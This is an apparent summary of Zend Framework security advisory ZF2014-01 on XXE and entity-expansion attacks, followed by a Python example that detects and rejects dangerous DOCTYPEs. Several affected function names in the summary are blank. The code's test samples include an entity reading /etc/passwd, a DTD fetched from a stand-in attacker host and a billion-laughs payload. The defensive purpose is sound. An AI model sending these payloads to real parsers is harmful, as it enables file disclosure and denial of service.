Key vulnerability information

Vulnerability description
Advisory ID: ZF2014-01
Vulnerability type: Potential XXE/XEE attacks
Affected functions: , ,
Affected components: Multiple components using PHP's , , and are vulnerable.

Attack types
XML eXternal Entity (XXE) Injection:
- Description: The affected parsers are insecure by default: an attacker can declare external entities by adding a DOCTYPE element to an XML document or string, and the parser resolves them when they are referenced. On the host doing the parsing this can open arbitrary files and/or TCP connections.
XML Entity Expansion (XEE):
- Description: Leads to Denial of Service (DoS) when the XML DOCTYPE declaration includes entity definitions that reference each other recursively or circularly, so that a few bytes of input expand into a very large amount of memory during parsing.

Action taken
Patch extended: The patch was extended to all uses of the PHP functions named above, to prevent XXE and XEE attacks.
New components: Provided and to scan and load XML documents safely.
Measures: Used and checked for ENTITY elements in the document type declaration, refusing to load a document that contains any.

Versions (releases containing the fix)
Zend Framework 1: 1.12.4
Zend Framework 2: 2.1.6 and 2.2.6
Various Zend libraries: 2.0.2

Other information
References: Links to more information about XXE and XEE attacks.
Acknowledgements: Acknowledgments for reporting and fixing the issues.
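The two checks the advisory describes (refuse a document whose DOCTYPE declares or fetches entities, and treat recursive or circular entity definitions as an attack rather than parsing them) are shown below as an added Python example. This is not Zend Framework's own code and does not reproduce its components; the function names, the classification labels and the XML samples are all constructed for this example. It is stricter than the page's description in one respect: a DOCTYPE that points at an external DTD via SYSTEM or PUBLIC is also refused, because that DTD can carry entity declarations the pre-parse scan would never see.

```python
import re
import xml.etree.ElementTree as ET


class XmlSecurityError(ValueError):
    """Raised when a document carries a DOCTYPE that could expand or fetch entities."""


# XML keywords are case-sensitive, so these patterns deliberately are too.
_DOCTYPE_RE = re.compile(r"<!DOCTYPE\b[^\[>]*(?:\[(?P<subset>.*?)\])?\s*>", re.DOTALL)
_ENTITY_RE = re.compile(r"<!ENTITY\b(?P<body>[^>]*)>", re.DOTALL)
_EXTERNAL_ID_RE = re.compile(r"\b(?:SYSTEM|PUBLIC)\b")
_INTERNAL_ENTITY_RE = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
_ENTITY_REF_RE = re.compile(r"&(\w+);")


def classify_doctype(xml: str) -> str:
    """Classify the DOCTYPE as 'none', 'plain', 'external-dtd', 'xxe' or 'xee'."""
    m = _DOCTYPE_RE.search(xml)
    if m is None:
        return "none"
    subset = m.group("subset")
    # The text before the internal subset may name an external DTD (SYSTEM/PUBLIC);
    # a parser would fetch it, and it may itself declare entities.
    head_end = m.start("subset") if subset is not None else m.end()
    if _EXTERNAL_ID_RE.search(xml[m.start():head_end]):
        return "external-dtd"
    bodies = _ENTITY_RE.findall(subset or "")
    if not bodies:
        return "plain"
    # An entity with an external identifier is the XXE case; entities that are
    # purely internal can still be abused for expansion (XEE).
    if any(_EXTERNAL_ID_RE.search(body) for body in bodies):
        return "xxe"
    return "xee"


def scan(xml: str) -> ET.Element:
    """Parse a document only after rejecting any DOCTYPE that declares or fetches entities."""
    kind = classify_doctype(xml)
    if kind in ("xxe", "xee", "external-dtd"):
        raise XmlSecurityError(f"refusing to parse XML: DOCTYPE classified as {kind}")
    return ET.fromstring(xml)


def is_rejected(xml: str) -> bool:
    """True if scan() refuses the document."""
    try:
        scan(xml)
    except XmlSecurityError:
        return True
    return False


def expansion_sizes(xml: str) -> dict:
    """Expanded length of each internal entity, computed without expanding anything.
    Raises XmlSecurityError on circular or undeclared references."""
    m = _DOCTYPE_RE.search(xml)
    subset = m.group("subset") if m else None
    defs = dict(_INTERNAL_ENTITY_RE.findall(subset or ""))
    sizes: dict = {}

    def size_of(name: str, chain: frozenset) -> int:
        if name in sizes:
            return sizes[name]
        if name in chain:
            raise XmlSecurityError(f"circular entity reference through &{name};")
        if name not in defs:
            raise XmlSecurityError(f"reference to undeclared entity &{name};")
        value = defs[name]
        total = len(value)
        # Replace each reference's own text with the expanded size of its target.
        for ref in _ENTITY_REF_RE.finditer(value):
            total += size_of(ref.group(1), chain | {name}) - len(ref.group(0))
        sizes[name] = total
        return total

    for name in defs:
        size_of(name, frozenset())
    return sizes


def has_unbounded_entities(xml: str) -> bool:
    """True if the entity definitions cannot be expanded to a finite size."""
    try:
        expansion_sizes(xml)
    except XmlSecurityError:
        return True
    return False


# Constructed samples for this example (not taken from the advisory).
BENIGN = '<?xml version="1.0"?><root><a>1</a></root>'
PLAIN_DOCTYPE = "<!DOCTYPE note><note>hello</note>"
XXE = '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
EXTERNAL_DTD = '<!DOCTYPE foo SYSTEM "http://attacker.example/evil.dtd"><foo/>'
XEE = (
    "<!DOCTYPE lolz [\n"
    '  <!ENTITY lol "lol">\n'
    '  <!ENTITY lol2 "' + "&lol;" * 10 + '">\n'
    '  <!ENTITY lol3 "' + "&lol2;" * 10 + '">\n'
    '  <!ENTITY lol4 "' + "&lol3;" * 10 + '">\n'
    "]>\n<lolz>&lol4;</lolz>"
)
CIRCULAR = '<!DOCTYPE a [<!ENTITY a "&b;"><!ENTITY b "&a;">]><a>&a;</a>'

if __name__ == "__main__":
    samples = [("benign", BENIGN), ("plain doctype", PLAIN_DOCTYPE), ("xxe", XXE),
               ("external dtd", EXTERNAL_DTD), ("xee", XEE), ("circular", CIRCULAR)]
    for label, doc in samples:
        verdict = "rejected" if is_rejected(doc) else "parsed"
        print(f"{label:14s} {classify_doctype(doc):13s} {verdict}")
    print("xee expansion sizes:", expansion_sizes(XEE))
    print("circular is unbounded:", has_unbounded_entities(CIRCULAR))
```

The scan is deliberately textual and runs before any parser sees the bytes, which is the point of the advisory's measure: a parser that is insecure by default must not be handed a DOCTYPE with entity declarations at all. The size accounting in `expansion_sizes` shows why the XEE case is a DoS even with only four entity levels (a 3-byte entity grows to 3000 bytes here, and each extra level multiplies by ten), and why a cycle has to be caught before expansion rather than by waiting for the parser to run out of memory.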